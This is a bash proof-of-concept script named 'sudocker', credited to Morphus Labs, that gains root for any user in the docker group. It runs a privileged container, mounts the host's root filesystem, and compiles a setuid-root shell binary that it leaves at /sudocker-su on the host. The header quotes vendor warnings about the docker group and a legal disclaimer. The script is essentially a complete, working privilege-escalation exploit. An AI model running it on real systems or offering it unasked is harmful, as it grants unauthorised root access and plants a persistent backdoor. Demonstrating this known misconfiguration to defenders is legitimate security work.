#!/bin/bash
#
# sudocker: become root by being on the docker group
#
# Copyright (C) 2018  Morphus Labs
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# "Warning: The docker group grants privileges equivalent to the root user."
#         -- https://docs.docker.com/install/linux/linux-postinstall/
#
# "Anyone added to the docker group is root equivalent"
#         -- https://wiki.archlinux.org/index.php/Docker
#
# "This needs more prominent documentation. Yes it's there, half way down
#  the page, but it's effectively hidden in a "security speak" document."
#         -- @markriggins, https://github.com/docker/docker/issues/9976
#
# "First of all, only trusted users should be allowed to control your Docker
#  daemon."
#         -- https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface
#
# "Warning: The docker group is equivalent to the root user"
#         -- https://developer.fedoraproject.org/tools/docker/docker-installation.html
#
# NOTE: this proof-of-concept installs "/sudocker-su" on "/",
#       remember to delete it afterwards.
#
# DISCLAIMER:
# Escalating privileges without concent is illegal.  It is the user's
# responsibility to obey all applicable laws.  Developers assume no liability
# and are not responsible for any misuse or damage caused by this program.


DEBUG=true

errxit() {
	echo "$0: $@"
	exit 1
}

debug() {
	[ -n "$DEBUG" ] && echo "$@"
}

[ -f /sudocker-su ] && exec /sudocker-su
debug "\`\`/sudocker-su'' does not exist, using docker run to create it"
groups | grep -q '\bdocker\b' || errxit "not in the docker group, abort."
root=$(readlink -f $(mount | grep " / " | sed -e "s/ .*//"))
debug "root is $root"
docker run --rm -ti --privileged ubuntu /bin/bash -c "
mount $root /mnt
apt-get -qy update
apt-get -qy install gcc
cat > sudocker-su.c <<SUDOCKER-SU
#include <unistd.h>
int main() {
	char *argv[]={\"/bin/bash\",NULL};
	setuid(0);
	setgid(0);
	execvp(\"/bin/bash\",argv);
	return 0;
}
SUDOCKER-SU
gcc sudocker-su.c -o /mnt/sudocker-su
chmod 4755 /mnt/sudocker-su
umount /mnt
"
debug "\`\`/sudocker-su'' is installed, attempting to run it"
exec /sudocker-su
